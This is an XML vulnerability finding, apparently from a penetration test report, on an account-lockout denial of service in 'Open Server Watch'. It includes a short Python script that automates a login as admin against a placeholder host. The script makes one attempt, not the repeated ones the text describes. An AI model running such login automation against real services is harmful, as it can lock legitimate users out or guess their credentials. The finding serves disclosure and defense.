34 lines
1.1 KiB
XML
34 lines
1.1 KiB
XML
<finding id="dos" threatLevel="Low" type="Denial of Service">
|
|
<title>Denial of Service</title>
|
|
|
|
<description>
|
|
<p>The bruteforce hammering protection of Open Server Watch sets timeouts on a per-username basis. An attacker could automatically hit the server repeatedly with relevant usernames (e.g. "admin") in order to lock out those users from logging in.</p>
|
|
</description>
|
|
|
|
<technicaldescription>
|
|
<p>The following python script repeatedly attempts to login as the admin user:</p>
|
|
|
|
<code>#!/usr/bin/python
|
|
import mechanize
|
|
|
|
mech = mechanize.Browser()
|
|
mech.set_handle_equiv(True)
|
|
mech.set_handle_redirect(True)
|
|
mech.set_handle_referer(True)
|
|
|
|
users = [('admin', 'password')]
|
|
mech.open('https://osw.sittingduck.bv/login.htm')
|
|
for u, p in users:
|
|
mech.select_form(nr=0)
|
|
mech.form['user'] = u
|
|
mech.form['pass'] = p
|
|
response = mech.submit()
|
|
if response.geturl() == 'https://osw.sittingduck.bv/login_success.html':
|
|
print 'User/Password combo: ',''.join([u, '/', p])
|
|
break</code>
|
|
</technicaldescription>
|
|
|
|
<recommendation>
|
|
<p>Unfortunately, no patch for this issue this exists upstream.</p>
|
|
</recommendation>
|
|
</finding> |